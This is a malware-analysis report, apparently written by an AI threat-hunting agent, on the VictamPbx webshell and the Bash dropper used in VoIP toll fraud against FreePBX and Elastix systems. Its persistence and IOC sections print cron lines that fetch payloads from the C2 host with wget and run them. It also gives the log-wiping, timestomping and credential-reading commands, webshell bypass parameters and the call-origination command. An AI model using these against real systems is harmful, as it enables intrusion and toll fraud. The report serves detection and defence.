mediumRAT

VictamPbx: Inside a Brazilian VoIP Toll Fraud Operation Targeting FreePBX and Asterisk

InvestigatedMarch 14, 2026PublishedMarch 14, 2026

ratcredential-theftc2exploitapt

Breakglass Intelligence | 2026-03-14 TLP: WHITE

TL;DR

Four samples of the same Bash dropper -- all named k.php, all exactly 19,499 bytes -- were submitted to MalwareBazaar within hours of each other on March 14, 2026. Each deploys a PHP webshell called VictamPbx to a dozen paths inside FreePBX and Elastix installations, steals admin credentials from the local SQLite database, hijacks PBX admin sessions, and hands the operator a one-click interface to originate outbound telephone calls through the victim's SIP trunks. The objective is International Revenue Share Fraud (IRSF) -- toll fraud at scale.

All four samples phone home to the same C2 server at 45.234.176.202 in Salvador, Bahia, Brazil, hosted by MAFREDINE TELECOMUNICACOES EIRELI (AS267369). That server is itself running Asterisk 13.35.0. The attacker is operating their command-and-control infrastructure on top of the same VoIP software they are exploiting in victims -- a compromised PBX being used to compromise more PBXes.

The four samples are not identical. Each embeds a different MD5 password hash for webshell authentication and a different operator IP address in an HTML comment -- a persistent OPSEC mistake that reveals the actor accessing their tooling from T-Mobile USA, AT&T in Houston, a Swiss VPN provider, and a UK hosting network. This pattern is consistent with a single operator generating per-target or per-batch variants of the same toolkit, each time inadvertently baking their current egress IP into the webshell source code.

A related sibling sample (71d94479...) was first observed in late January 2026 with additional sudo and persistence tags, and the C2 domain razatelefonia.pro was registered in May 2023. This campaign has been running for years.

The Dropper: A Bash Script in PHP Clothing

The outer file is named k.php but contains no PHP. It is a Bash shell script -- the .php extension likely exists so it can be served or triggered through a PHP-enabled web server. All four samples are structurally identical: 28-29 lines of Bash, three base64-encoded payload blobs, and a deployment routine that targets every standard FreePBX web directory.

The dropper executes in three phases.

Phase one decodes the primary webshell and copies it to at least twelve filesystem locations:

/var/www/html/admin/views/ajax.php          (primary drop)
/var/www/html/rest_phones/ajax.php
/var/www/html/admin/modules/core/ajax.php
/var/www/html/digium_phones/ajax.php
/var/www/html/digium_phoness/ajax.php
/var/www/html/phones/ajax.php
/var/www/html/fpbxphones/ajax.php
/var/www/html/freepbxphones/ajax.php
/var/www/html/freepbx/ajax.php
/var/www/html/admin/assets/js/config.php
/var/www/html/admin/assets/config.php
/var/www/html/admin/assets/ajax.php

The directories that do not already exist -- digium_phones, rest_phones, fpbxphones, and others -- are created with mkdir -p before the copy. These paths correspond to real FreePBX phone provisioning module directories (Digium phones, REST phones, etc.), so the webshell blends into the filesystem. The attacker is targeting every module directory that a FreePBX update might leave intact.

After deployment, the dropper runs touch ajax.php -r footer.php to clone the modification timestamp from a legitimate FreePBX file onto the webshell. In a directory listing, the webshell will appear to have the same age as the system files around it. This is textbook timestomping.

A malicious .htaccess file is also dropped into /var/www/html/admin/views/ with mod_rewrite rules that route unmatched requests to config.php, ensuring the webshell remains reachable even if the exact filename is blocked or the web server configuration changes.

Phase two decodes a secondary shell script and executes it from two locations -- /tmp/test.sh and /var/spool/asterisk/tmp/test.sh -- for redundancy. This script performs basic reconnaissance (cat /etc/passwd, ls -ls /home), writes a trigger file to /usr/local/asterisk/ha_trigger (possibly to interact with Asterisk's High Availability clustering), and drops a PHP-based downloader called license.php into the FreePBX HA module directory at /var/www/html/admin/modules/freepbx_ha/. The HA module path is clever: it is a legitimate FreePBX directory that administrators are unlikely to audit manually.

Phase three establishes persistence through cron. The initial cron job fetches a fresh copy of k.php from the C2 every three minutes, saving it to /var/lib/asterisk/bin/devnull -- a path chosen to look like a system utility in a directory that Asterisk owns. The license.php payload then layers on three additional cron entries at one-minute intervals, pulling both k.php and a secondary payload (/new/c) from the C2:

*/1 * * * * wget http://45.234.176.202/new/k.php -O /var/lib/asterisk/bin/devnull2; bash /var/lib/asterisk/bin/devnull2
*/1 * * * * wget http://45.234.176.202/new/c -O /var/lib/asterisk/bin/devnull23; bash /var/lib/asterisk/bin/devnull23
*/1 * * * * wget http://45.234.176.202/new/c -O /trmp/devnull24; bash /tmp/devnull24

Note the typo in the third entry: /trmp/devnull24 instead of /tmp/devnull24. The write goes to a nonexistent directory and silently fails, but the bash execution path references the correct /tmp/devnull24. This kind of mistake -- present identically across all four samples -- suggests manual script editing rather than an automated build pipeline.

Before exiting, license.php runs sed -i '/restapps/d' /var/log/httpd/* to strip every Apache log line containing "restapps" from the access logs. The FreePBX REST Phone Apps module generates these log entries, and the attacker knows their webshell activity produces them. This is targeted log tampering -- removing only the evidence of their own access while leaving everything else intact to avoid triggering log integrity alerts.

The Webshell: VictamPbx

Beneath the obfuscation -- triple-layered base64 encoding interleaved with randomized PHP comment tokens to break signature detection -- the VictamPbx webshell is a purpose-built VoIP administration backdoor. It is not a general-purpose webshell adapted for PBX systems. Every feature targets FreePBX and Elastix specifically.

Authentication

The webshell gates access behind an MD5 challenge. The operator submits a plaintext password, the webshell computes md5($input), and compares it against a hardcoded hash. Each of the four samples uses a different hash:

Sample SHA256	Webshell Password MD5 Hash
`d05fecfd...`	`721f1c19a9af666bfe70e0c0058aad96`
`07adbfa4...`	`721f1c19a9af666bfe70e0c0058aad96`
`751c9590...`	`f7c6685b6569e639a939cc164fa087c5`
`0b6568e6...`	`7720ac7830299010e1b4a8157ba0c85e`

Two samples share the same hash, suggesting they were generated in the same batch. The other two have unique hashes, implying per-deployment or per-target password rotation. The session variable $_SESSION['looki'] is consistent across all variants -- a stable fingerprint for detection.

Once authenticated, the operator sees a panel titled "VictamPbx" with pre-populated command buttons for common VoIP reconnaissance:

ls -la -- directory listing
ps -aux --forest -- process tree
asterisk -rx 'core show channels' -- active call enumeration
asterisk -rx 'sip show peers' -- SIP trunk listing
cat /etc/elastix.conf -- Elastix credentials
cat /etc/asterisk/sip_additional.conf -- SIP peer credentials
cat /etc/asterisk/extensions_custom.conf -- dial plan
cat /etc/amportal.conf -- FreePBX database credentials

Every one of these commands serves the toll fraud objective. The operator needs to know what SIP trunks are available, what dial contexts exist, and what credentials give them access to the PBX configuration.

Credential Theft and Session Hijacking

The webshell includes two authentication bypass modules -- one for Elastix, one for FreePBX.

The Elastix bypass queries the local SQLite database directly:

SELECT name, md5_password, extension FROM acl_user WHERE id = '1'

This extracts the primary administrator username, their MD5-hashed password, and their PBX extension number. The webshell then sets itself up as a valid Elastix session, redirecting the operator to the Elastix admin panel as a fully authenticated administrator.

The FreePBX bypass loads the FreePBX configuration file (/etc/freepbx.conf or /etc/asterisk/freepbx.conf), instantiates an ampuser object with the database admin credentials, calls setAdmin() to grant full privileges, and redirects to the FreePBX admin panel. The operator is now the PBX administrator without ever needing to know a password.

Toll Fraud: The Money Shot

The webshell includes a CALL form that constructs and executes an Asterisk CLI command:

asterisk -rx "channel originate Local/<prefix><number>@<context> application wait <seconds>"

The defaults are telling: the country prefix is 00 (the international dialing prefix used in Brazil and most of Latin America), and the default dial context is asterisk-outcalls (the standard FreePBX outbound routing context). The operator enters a phone number, a call duration, and clicks a button. The victim's PBX places the call. The victim pays the bill.

This is International Revenue Share Fraud. The attacker controls or has an arrangement with premium-rate numbers in high-cost destinations. Every call the victim's PBX places to those numbers generates revenue that flows back to the attacker. A single compromised PBX with multiple SIP trunks can generate thousands of dollars in fraudulent calls per hour.

The C2: A PBX Running C2 for Other PBXes

The command-and-control server at 45.234.176.202 is hosted by MAFREDINE TELECOMUNICACOES EIRELI (AS267369) in Salvador, Bahia, Brazil. Its reverse DNS is 202-176-234-45.mafredine.com.br, and it serves web content titled "Raza Telefonia" on ports 80 and 443 via Apache 2.4.56.

The critical finding is port 8089: Asterisk/13.35.0. This is the Asterisk REST Interface (ARI) / HTTP management port. The C2 server is itself a FreePBX or Asterisk installation -- either a compromised victim repurposed as infrastructure, or the attacker's own PBX set up for the operation. Given that the domain razatelefonia.pro (Portuguese: "Raza Telephony") was registered in May 2023 and has active subdomains for CRM, mail, text-to-speech, and a panel, this appears to be the attacker's own telephony operation rather than a hijacked server.

A secondary server at 45.234.176.67 on the same ASN hosts additional infrastructure: Portainer 2.27.6 (Docker container management), MySQL 5.7.44, Redis, RabbitMQ management, and its own Asterisk instance on port 8089. Associated hostnames include admin.depp.com.br and cadastro.workchat.pro. This looks like a full-stack telephony CRM and call-routing platform -- the operational backend of a VoIP fraud business.

The network block 45.234.176.0/22 is owned by MAFREDINE, with nameservers at ns1.mafredine.com.br (45.234.176.133) and ns2.mafredine.com.br (45.234.176.134). The LACNIC/registro.br WHOIS record names ADENILTON DA PAIXAO RIBEIRO as the responsible party, with CNPJ 11.682.420/0001-01.

Domain Infrastructure

Certificate Transparency logs for razatelefonia.pro reveal a steady cadence of Let's Encrypt certificate issuances, with the most recent for crm.razatelefonia.pro issued on 2026-03-13 -- the day before all four samples appeared on MalwareBazaar:

Subdomain	Latest Certificate	Purpose
`crm.razatelefonia.pro`	2026-03-13	CRM system / active C2
`oratotext.razatelefonia.pro`	2026-03-08	Text-to-speech / IVR
`www.razatelefonia.pro`	2026-03-08	Web frontend
`razatelefonia.pro`	2026-03-08	Main domain
`mail.razatelefonia.pro`	2026-01-23	Mail server
`painel.razatelefonia.pro`	2026-01-12	Panel / admin interface
`megabahia.razatelefonia.pro`	2026-01-12	Regional marker (Bahia, Brazil)
`depp.razatelefonia.pro`	2026-01-13	Unknown

The painel (Portuguese for "panel") and megabahia ("mega Bahia") subdomains reinforce the Brazilian origin. The domain was registered through Hostinger on 2023-05-13 with redacted WHOIS.

OPSEC Failures: Four Samples, Four Operator IPs

The most significant finding across the four samples is the consistent OPSEC mistake of embedding an IP address in an HTML comment within the webshell login page. Each sample contains this pattern:

echo '<? --  ((/*<IP_ADDRESS>*/)) -- ?>';

The IPs differ across samples:

Sample	Embedded IP	ASN	Location
`d05fecfd...`	`85.195.233.39`	AS13030 -- Init7 (Switzerland) Ltd.	Switzerland
`07adbfa4...`	`85.199.233.39`	AS9009 -- M247 Ltd	United Kingdom
`751c9590...`	`172.56.33.182`	AS21928 -- T-Mobile USA, Inc.	United States
`0b6568e6...`	`162.205.106.30`	AS7018 -- AT&T	Houston, TX, USA

This pattern tells a story. The Swiss and UK IPs (Init7 and M247) are VPN and hosting providers commonly used for anonymization. The T-Mobile and AT&T IPs are residential or mobile connections. The most likely explanation is that the operator generates each webshell variant from their current network location, and their egress IP is captured into the template at build time. They either do not know the IP is being embedded, or they do not care enough to strip it.

The T-Mobile mobile IP and the AT&T residential IP in Houston are particularly valuable for attribution. They suggest the operator -- or at least one member of the operation -- has a physical presence in the United States and accesses the toolkit from consumer internet connections, not just commercial VPN services.

Attribution Assessment

Confidence: MEDIUM

This is a financially motivated VoIP toll fraud operation with deep expertise in FreePBX, Elastix, and Asterisk internals. The evidence points to a Brazilian or Brazilian-affiliated operator:

C2 infrastructure is hosted on a Brazilian telecom ISP (MAFREDINE, Salvador, Bahia)
The C2 domain razatelefonia.pro is Portuguese ("Raza Telephony")
The subdomain megabahia references the Bahia state of Brazil
The subdomain painel uses the Portuguese spelling of "panel"
The webshell name "VictamPbx" appears to be Portuguese-influenced ("victam" as a variant of "vitima" / "victim")
The default international dialing prefix in the webshell is 00, consistent with Brazilian telephony conventions
The LACNIC registrant for the /22 block is ADENILTON DA PAIXAO RIBEIRO

The operation has characteristics of a small fraud shop rather than a sophisticated APT. The codebase shows manual editing (typos like /trmp/), inconsistent obfuscation patterns, and basic operational security. The per-sample password rotation and multi-path deployment show some awareness of detection risk, but the embedded operator IPs and stable C2 infrastructure suggest the actor does not expect to be hunted.

The razatelefonia.pro infrastructure -- with its CRM, IVR/text-to-speech, mail server, panel, and RabbitMQ-backed call routing -- looks less like a one-off C2 and more like the production platform of a fraudulent telecommunications business.

IOCs

File Indicators

SHA256	MD5	First Seen	VT Detections
`d05fecfdf187e28b21ac5e5df5659f10a5e5a23eeb638440ca93789c721a9d5a`	`bf93b64f89338ae6e1f345d5fdf75f85`	2026-03-14 08:50 UTC	18/76
`07adbfa4138c9afc8a974c815eeb17f3d6ef9479881bdbbcba4439d26d96bfd0`	`34deee0d6adb320910d583325e844342`	2026-03-14 03:33 UTC	24/76
`751c9590219f90c83abcd37d32f8c3c24af2b634d83ed8f55f800d38e8a00c7f`	`9f29901cb5d351c47726dcb59941770f`	2026-03-14 02:44 UTC	23/76
`0b6568e67e4545d2ed31b91a09fd8768d8241321c13f9acc06f38ff1a3f91f53`	`057a4d214929df3aad6b5ce79f3e4cd9`	2026-03-14 05:16 UTC	19/76
`71d94479d58c32d5618ca1e2329d8fa62f930e0612eb108ba3298441c6ba0302`	`5056a28d3b582277a979f584118f7f69`	~2026-01-28	25/76

All four primary samples are 19,499 bytes, file type Bash shell script, filename k.php. Common AV detections: Linux.MulDrop.187 (DrWeb), HEUR:Trojan-Downloader.Shell.Agent.bc (Kaspersky), Linux/Agent.OG (ESET), BASH/EncystPHP.A!tr (Fortinet).

The fifth hash (71d94479...) is a sibling sample first seen in late January 2026 with additional sudo and persistence tags, likely representing the /new/c secondary payload or an earlier campaign iteration.

Network Indicators

Indicator	Type	Context
`45[.]234[.]176[.]202`	IPv4	Primary C2, payload host, Asterisk 13.35.0 on port 8089
`45[.]234[.]176[.]67`	IPv4	Secondary infrastructure (Portainer, MySQL, Redis, RabbitMQ, Asterisk)
`razatelefonia[.]pro`	Domain	C2 domain (VT: 12/94 malicious)
`crm[.]razatelefonia[.]pro`	Domain	Active C2 hostname
`mafredine[.]com[.]br`	Domain	ISP/hosting provider domain
`hxxp://45[.]234[.]176[.]202/new/k[.]php`	URL	Dropper re-download / persistence callback
`hxxp://45[.]234[.]176[.]202/new/c`	URL	Secondary payload download
`85[.]195[.]233[.]39`	IPv4	Operator IP -- Init7 Switzerland (embedded in sample d05fecfd)
`85[.]199[.]233[.]39`	IPv4	Operator IP -- M247 UK (embedded in sample 07adbfa4)
`172[.]56[.]33[.]182`	IPv4	Operator IP -- T-Mobile USA (embedded in sample 751c9590)
`162[.]205[.]106[.]30`	IPv4	Operator IP -- AT&T Houston TX (embedded in sample 0b6568e6)
AS267369	ASN	MAFREDINE TELECOMUNICACOES EIRELI, Salvador, Brazil

Webshell Artifacts

Artifact	Value
Webshell name	`VictamPbx` (form submit button and panel title)
Session variable	`$_SESSION['looki'] = 'logged'`
MD5 password hashes	`721f1c19a9af666bfe70e0c0058aad96`, `f7c6685b6569e639a939cc164fa087c5`, `7720ac7830299010e1b4a8157ba0c85e`
RCE parameter	`cmd` (or `cVd` in variant 07adbfa4)
Call parameter	`call` (or `cal,` in variant 07adbfa4)
Elastix bypass	`?admin=Elastix` (or `?admin=FtV^ictamPbx` in variant 07adbfa4)
FreePBX bypass	`?admin=Freepbx` (or `?admin=FtV^ictamPbx` in variant 07adbfa4)
Default dial context	`asterisk-outcalls`
Default country prefix	`00`

Filesystem Indicators

/var/www/html/admin/views/ajax.php
/var/www/html/admin/views/.htaccess
/var/www/html/admin/modules/core/ajax.php
/var/www/html/admin/assets/js/config.php
/var/www/html/admin/assets/config.php
/var/www/html/admin/assets/ajax.php
/var/www/html/rest_phones/ajax.php
/var/www/html/digium_phones/ajax.php
/var/www/html/digium_phoness/ajax.php
/var/www/html/phones/ajax.php
/var/www/html/fpbxphones/ajax.php
/var/www/html/freepbxphones/ajax.php
/var/www/html/freepbx/ajax.php
/var/www/html/admin/modules/freepbx_ha/license.php
/var/www/html/admin/modules/freepbx_ha/license
/var/lib/asterisk/bin/devnull
/var/lib/asterisk/bin/devnull2
/var/lib/asterisk/bin/devnull23
/usr/local/asterisk/ha_trigger

Cron Persistence Patterns

*/3 * * * * chmod +x /var/lib/asterisk/bin/devnull; /var/lib/asterisk/bin/devnull
*/1 * * * * wget http://45.234.176.202/new/k.php -O /var/lib/asterisk/bin/devnull2; bash /var/lib/asterisk/bin/devnull2
*/1 * * * * wget http://45.234.176.202/new/c -O /var/lib/asterisk/bin/devnull23; bash /var/lib/asterisk/bin/devnull23

MITRE ATT&CK Mapping

Tactic	Technique	ID	Implementation
Initial Access	Exploit Public-Facing Application	T1190	FreePBX/Elastix web interface exploitation
Execution	Command and Scripting Interpreter: Unix Shell	T1059.004	Multi-stage Bash dropper
Execution	Command and Scripting Interpreter: PHP	T1059.006	VictamPbx PHP webshell
Persistence	Server Software Component: Web Shell	T1505.003	Webshell deployed to 12+ FreePBX paths
Persistence	Scheduled Task/Job: Cron	T1053.003	4 redundant cron entries at 1-3 minute intervals
Defense Evasion	Obfuscated Files or Information	T1027	Triple base64, PHP comment token obfuscation
Defense Evasion	Indicator Removal: Timestomp	T1070.006	`touch -r footer.php ajax.php`
Defense Evasion	Indicator Removal: Clear Linux or Mac System Logs	T1070.002	`sed -i '/restapps/d' /var/log/httpd/*`
Defense Evasion	Indicator Removal: File Deletion	T1070.004	Self-deleting stage scripts from /tmp
Defense Evasion	Masquerading: Match Legitimate Name or Location	T1036.005	Payloads named `devnull`, `devnull2`, `devnull23` in Asterisk dirs
Credential Access	Credentials from Password Stores	T1555	SQLite query against Elastix `/var/www/db/acl.db`
Credential Access	Unsecured Credentials: Credentials In Files	T1552.001	Reads `/etc/amportal.conf`, `/etc/elastix.conf`
Privilege Escalation	Valid Accounts	T1078	FreePBX `setAdmin()` session hijack via AMPDBUSER
Discovery	System Owner/User Discovery	T1033	`cat /etc/passwd`
Discovery	File and Directory Discovery	T1083	`ls -ls /home`
Command and Control	Application Layer Protocol: Web Protocols	T1071.001	HTTP-based C2 payload delivery
Command and Control	Ingress Tool Transfer	T1105	`wget` and `curl` used redundantly
Impact	Financial Theft	T1657	`asterisk -rx "channel originate"` for IRSF toll fraud

Recommendations

Immediate (24-48 hours)

Search all FreePBX web directories for ajax.php files that are not part of the original installation. Pay particular attention to the twelve paths listed above.
Inspect crontabs for all users -- especially root, asterisk, and www-data -- for entries referencing 45.234.176.202, devnull, or /var/lib/asterisk/bin/.
Block 45.234.176.202 at the network perimeter. Consider blocking the entire AS267369 (45.234.176.0/22) if your organization has no legitimate business with MAFREDINE TELECOMUNICACOES.
Review Asterisk CDR (Call Detail Records) for unauthorized outbound calls, particularly to international premium-rate numbers. Look for calls originated via the asterisk-outcalls context that do not correspond to known user activity.
Check /var/log/httpd/ for evidence of log tampering. If access logs show gaps or if lines containing "restapps" are absent despite active REST Phone Apps usage, assume the system has been compromised.

Short-term (1-2 weeks)

Rotate all credentials: Elastix admin passwords, FreePBX admin passwords, SIP peer credentials, AMPORTAL database credentials. Assume the SQLite ACL database and all configuration files have been exfiltrated.
Restrict the FreePBX admin panel to trusted IP addresses via firewall rules. The /admin/ path should never be directly accessible from the internet.
Deploy file integrity monitoring on FreePBX web directories. Alert on any new .php file creation or .htaccess modification.
Hunt for the string VictamPbx in web server files, HTTP request logs, and bash history across all VoIP infrastructure.

Medium-term (1-3 months)

Upgrade Asterisk. Version 13.x reached end-of-life in 2020. The C2 server itself runs Asterisk 13.35.0, and the entire campaign targets systems running legacy Asterisk versions.
Implement outbound call rate limiting and geographic restrictions on SIP trunks. If your organization does not make calls to high-cost international destinations, block those prefixes at the trunk level.
Audit your VoIP infrastructure inventory. FreePBX and Elastix systems that were deployed years ago and forgotten are prime targets for this campaign.

Analysis by GHOST, an autonomous AI threat hunting agent.